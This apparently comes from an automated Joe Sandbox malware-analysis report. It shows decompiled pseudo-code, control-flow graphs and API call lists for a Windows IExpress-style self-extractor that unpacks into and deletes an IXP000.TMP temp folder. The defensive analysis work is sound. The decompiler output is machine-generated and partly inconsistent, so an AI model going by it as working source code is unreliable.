                                                                                                                                                                                                                                                control_flow_graph 450 52f1d-52f3d 451 52f6c-52f73 call 55164 450->451 452 52f3f-52f46 450->452 461 53041 451->461 462 52f79-52f80 call 555a0 451->462 453 52f5f-52f66 call 53a3f 452->453 454 52f48 call 551e5 452->454 453->451 453->461 459 52f4d-52f4f 454->459 459->461 464 52f55-52f5d 459->464 463 53043-53053 call 56ce0 461->463 462->461 469 52f86-52fbe GetSystemDirectoryA call 5658a LoadLibraryA 462->469 464->451 464->453 472 52ff7-53004 FreeLibrary 469->472 473 52fc0-52fd4 GetProcAddress 469->473 475 53017-53024 SetCurrentDirectoryA 472->475 476 53006-5300c 472->476 473->472 474 52fd6-52fee DecryptFileA 473->474 474->472 485 52ff0-52ff5 474->485 478 53054-5305a 475->478 479 53026-5303c call 544b9 call 56285 475->479 476->475 477 5300e call 5621e 476->477 489 53013-53015 477->489 481 53065-5306c 478->481 482 5305c call 53b26 478->482 479->461 487 5307c-53089 481->487 488 5306e-53075 call 5256d 481->488 492 53061-53063 482->492 485->472 494 530a1-530a9 487->494 495 5308b-53091 487->495 500 5307a 488->500 489->461 489->475 492->461 492->481 498 530b4-530b7 494->498 499 530ab-530ad 494->499 495->494 496 53093 call 53ba2 495->496 503 53098-5309a 496->503 498->463 499->498 502 530af call 54169 499->502 500->487 502->498 503->461 505 5309c 503->505 505->494
C-Code - Quality: 82%
E00052F1D(void* __ecx, int __edx) {
	signed int _v8;
	char _v272;
	_Unknown_base(*)()* _v276;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t9;
	void* _t11;
	struct HWND__* _t12;
	void* _t14;
	int _t21;
	signed int _t22;
	signed int _t25;
	intOrPtr* _t26;
	signed int _t27;
	void* _t30;
	_Unknown_base(*)()* _t31;
	void* _t34;
	struct HINSTANCE__* _t36;
	intOrPtr _t41;
	intOrPtr* _t44;
	signed int _t46;
	int _t47;
	void* _t58;
	void* _t59;

	_t43 = __edx;
	_t9 =  *0x58004; // 0x5a679bd9
	_v8 = _t9 ^ _t46;
	if( *0x58a38 != 0) {
		L5:
		_t11 = E00055164(_t52);
		_t53 = _t11;
		if(_t11 == 0) {
			L16:
			_t12 = 0;
			L17:
			return E00056CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
		}
		_t14 = E000555A0(_t53); // executed
		if(_t14 == 0) {
			goto L16;
		} else {
			_t45 = 0x105;
			GetSystemDirectoryA( &_v272, 0x105);
			_t43 = 0x105;
			_t40 =  &_v272;
			E0005658A( &_v272, 0x105, "advapi32.dll");
			_t36 = LoadLibraryA( &_v272);
			_t44 = 0;
			if(_t36 != 0) {
				_t31 = GetProcAddress(_t36, "DecryptFileA");
				_v276 = _t31;
				if(_t31 != 0) {
					_t45 = _t47;
					_t40 = _t31;
					 *0x5a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
					_v276();
					if(_t47 != _t47) {
						_t40 = 4;
						asm("int 0x29");
					}
				}
			}
			FreeLibrary(_t36);
			_t58 =  *0x58a24 - _t44; // 0x0
			if(_t58 != 0) {
				L14:
				_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
				if(_t21 != 0) {
					__eflags =  *0x58a2c - _t44; // 0x0
					if(__eflags != 0) {
						L20:
						__eflags =  *0x58d48 & 0x000000c0;
						if(( *0x58d48 & 0x000000c0) == 0) {
							_t41 =  *0x59a40; // 0x3, executed
							_t26 = E0005256D(_t41); // executed
							_t44 = _t26;
						}
						_t22 =  *0x58a24; // 0x0
						 *0x59a44 = _t44;
						__eflags = _t22;
						if(_t22 != 0) {
							L26:
							__eflags =  *0x58a38;
							if( *0x58a38 == 0) {
								__eflags = _t22;
								if(__eflags == 0) {
									E00054169(__eflags);
								}
							}
							_t12 = 1;
							goto L17;
						} else {
							__eflags =  *0x59a30 - _t22; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							_t25 = E00053BA2(); // executed
							__eflags = _t25;
							if(_t25 == 0) {
								goto L16;
							}
							_t22 =  *0x58a24; // 0x0
							goto L26;
						}
					}
					_t27 = E00053B26(_t40, _t44);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L16;
					}
					goto L20;
				}
				_t43 = 0x4bc;
				E000544B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
				 *0x59124 = E00056285();
				goto L16;
			}
			_t59 =  *0x59a30 - _t44; // 0x0
			if(_t59 != 0) {
				goto L14;
			}
			_t30 = E0005621E(); // executed
			if(_t30 == 0) {
				goto L16;
			}
			goto L14;
		}
	}
	_t49 =  *0x58a24;
	if( *0x58a24 != 0) {
		L4:
		_t34 = E00053A3F(_t51);
		_t52 = _t34;
		if(_t34 == 0) {
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(E000551E5(_t49) == 0) {
                                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t51 =  *0x58a38;
                                                                                                                                                                                                                                                				if( *0x58a38 != 0) {
                                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                                			}




























                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052f55
                                                                                                                                                                                                                                                0x00052f5d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00052F93
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00052FB2
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00052FC6
                                                                                                                                                                                                                                                • DecryptFileA.ADVAPI32 ref: 00052FE6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00052FF8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0005301C
                                                                                                                                                                                                                                                  • Part of subcall function 000551E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00052F4D,?,00000002,00000000), ref: 00055201
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 2126469477-58291647
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E00055467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t10;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                                				CHAR* _t48;
                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t10 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				if(__edx == 0) {
                                                                                                                                                                                                                                                					_t48 = 0x591e4;
                                                                                                                                                                                                                                                					_t42 = 0x104;
                                                                                                                                                                                                                                                					E00051680(0x591e4, 0x104);
                                                                                                                                                                                                                                                					L14:
                                                                                                                                                                                                                                                					_t13 = E000558C8(_t48); // executed
                                                                                                                                                                                                                                                					if(_t13 != 0) {
                                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                                						_t42 = _a4;
                                                                                                                                                                                                                                                						if(_a4 == 0) {
                                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                                							 *0x59124 = 0;
                                                                                                                                                                                                                                                							_t14 = 1;
                                                                                                                                                                                                                                                							L24:
                                                                                                                                                                                                                                                							return E00056CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t16 = E0005597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                                						if(_t16 != 0) {
                                                                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t61 =  *0x58a20; // 0x0
                                                                                                                                                                                                                                                						if(_t61 != 0) {
                                                                                                                                                                                                                                                							 *0x58a20 = 0;
                                                                                                                                                                                                                                                							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L22:
                                                                                                                                                                                                                                                						_t14 = 0;
                                                                                                                                                                                                                                                						goto L24;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                                						 *0x59124 = E00056285();
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x58a20 = 1;
                                                                                                                                                                                                                                                					goto L17;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t42 =  &_v268;
                                                                                                                                                                                                                                                				_t20 = E000553A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                                				if(_t20 == 0) {
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t48 = 0x591e4;
                                                                                                                                                                                                                                                				E00051781(0x591e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                                				if(( *0x59a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_t42 = 0x104;
                                                                                                                                                                                                                                                					E0005658A(_t48, 0x104, 0x51140);
                                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                                				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                                				if(_t26 == 0) {
                                                                                                                                                                                                                                                					_push("i386");
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					E0005658A(_t48, 0x104);
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t28 = _t26 - 1;
                                                                                                                                                                                                                                                				if(_t28 == 0) {
                                                                                                                                                                                                                                                					_push("mips");
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t29 = _t28 - 1;
                                                                                                                                                                                                                                                				if(_t29 == 0) {
                                                                                                                                                                                                                                                					_push("alpha");
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t29 != 1) {
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push("ppc");
                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                			}





















APIs
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000554C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005556F
  • Part of subcall function 000553A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000553FB
  • Part of subcall function 000553A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055402
  • Part of subcall function 000553A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005541F
  • Part of subcall function 000553A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005542B
  • Part of subcall function 000553A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055434
Strings
Memory Dump Source
• Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Similarity
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
• API String ID: 1979080616-186922987
• Opcode ID: c9539bf640f3b81850ea005948c21032554d1c1c495ed2580b771e59e249b7b1
• Instruction ID: 285e3a011cdae43826108d231f0780ecaf0465d0b54b28f58590d48d1af367dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9539bf640f3b81850ea005948c21032554d1c1c495ed2580b771e59e249b7b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A310871B00F149BDB609F399C746BF77DAAB81343B14412AAD0297291EE748E0D8695
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 648 52390-523b3 649 523b9-523bc 648->649 650 524cb-524df call 56ce0 648->650 649->650 651 523c2-52401 call 51680 call 516b3 FindFirstFileA 649->651 651->650 658 52407-5241f call 51680 651->658 661 52421-5242f lstrcmpA 658->661 662 52479-524a3 call 516b3 SetFileAttributesA DeleteFileA 658->662 663 52431-52443 lstrcmpA 661->663 664 524a9-524b7 FindNextFileA 661->664 662->664 663->664 666 52445-52477 call 516b3 call 5658a call 52390 663->666 664->658 668 524bd-524c5 FindClose RemoveDirectoryA 664->668 666->664 668->650
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E00052390(CHAR* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v280;
                                                                                                                                                                                                                                                				char _v284;
                                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                				int _t36;
                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                                				_t21 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                                				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                                				_t65 = __ecx;
                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					_pop(_t62);
                                                                                                                                                                                                                                                					_pop(_t66);
                                                                                                                                                                                                                                                					_pop(_t46);
                                                                                                                                                                                                                                                					return E00056CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E00051680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                                					_t58 = 0x104;
                                                                                                                                                                                                                                                					E000516B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                                					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                                					_t63 = _t22;
                                                                                                                                                                                                                                                					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                						_t58 = 0x104;
                                                                                                                                                                                                                                                						E00051680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                                						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                                							_t58 = 0x104;
                                                                                                                                                                                                                                                							E000516B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                                							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                                							DeleteFileA( &_v280);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                                								E000516B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                                								_t58 = 0x104;
                                                                                                                                                                                                                                                								E0005658A( &_v280, 0x104, 0x51140);
                                                                                                                                                                                                                                                								E00052390( &_v284);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                                					} while (_t36 != 0);
                                                                                                                                                                                                                                                					FindClose(_t63); // executed
                                                                                                                                                                                                                                                					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}






















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,00058A3A,000511F4,00058A3A,00000000,?,?), ref: 000523F6
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,000511F8), ref: 00052427
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,000511FC), ref: 0005243B
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00052495
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 000524A3
                                                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 000524AF
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 000524BE
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(00058A3A), ref: 000524C5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                • Opcode ID: c5be69ed50ca331c4fb98de637c8ae8f77ee2d9938a49b8f5e713f01451b1eb9
                                                                                                                                                                                                                                                • Instruction ID: 14478c1ef3cfbadfce6dc1eb883e9fd67a306c888517ee64971084ab4779806e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5be69ed50ca331c4fb98de637c8ae8f77ee2d9938a49b8f5e713f01451b1eb9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F316131604740ABD320DBA4CC89BEF73ECAFC6307F04492DB95586191EB78990D8B52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                			E00052BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				intOrPtr _t7;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                                				intOrPtr* _t17;
                                                                                                                                                                                                                                                				signed char _t19;
                                                                                                                                                                                                                                                				intOrPtr* _t21;
                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t4 = GetVersion();
                                                                                                                                                                                                                                                				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                                					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                                						if(_t21 != 0) {
                                                                                                                                                                                                                                                							_t17 = _t21;
                                                                                                                                                                                                                                                							 *0x5a288(0, 1, 0, 0);
                                                                                                                                                                                                                                                							 *_t21();
                                                                                                                                                                                                                                                							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                                							if(_t24 != _t24) {
                                                                                                                                                                                                                                                								_t17 = 4;
                                                                                                                                                                                                                                                								asm("int 0x29");
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t20 = _a12;
                                                                                                                                                                                                                                                				_t18 = _a4;
                                                                                                                                                                                                                                                				 *0x59124 = 0;
                                                                                                                                                                                                                                                				if(E00052CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                                					_t9 = E00052F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                                					_t22 = _t9; // executed
                                                                                                                                                                                                                                                					E000552B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                                					if(_t22 != 0) {
                                                                                                                                                                                                                                                						_t32 =  *0x58a3a; // 0x0
                                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                                							_t19 =  *0x59a2c; // 0x0
                                                                                                                                                                                                                                                							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                								E00051F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t6 =  *0x58588; // 0x0
                                                                                                                                                                                                                                                				if(_t6 != 0) {
                                                                                                                                                                                                                                                					CloseHandle(_t6);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t7 =  *0x59124; // 0x80070002
                                                                                                                                                                                                                                                				return _t7;
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                0x00052c95
                                                                                                                                                                                                                                                0x00052c98
                                                                                                                                                                                                                                                0x00052c98
                                                                                                                                                                                                                                                0x00052c9e
                                                                                                                                                                                                                                                0x00052ca7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000002,00000000,?,00056BB0,00050000,00000000,00000002,0000000A), ref: 00052C03
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00056BB0,00050000,00000000,00000002,0000000A), ref: 00052C18
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00052C28
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00056BB0,00050000,00000000,00000002,0000000A), ref: 00052C98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                • Opcode ID: 19b929f51b14aebbd9155dbc9b336b148430a72502164d80b97bbfd1428003db
                                                                                                                                                                                                                                                • Instruction ID: b32f3722e7014198e25792d01778be38db87490c4979a35a21abc3e9b253066a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19b929f51b14aebbd9155dbc9b336b148430a72502164d80b97bbfd1428003db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11C2313007059BEB206BB5AC89BAF3F999F87393F044125FD01E3293DA39EC498665
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00056F40() {
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(E00056EF0); // executed
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00056F45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
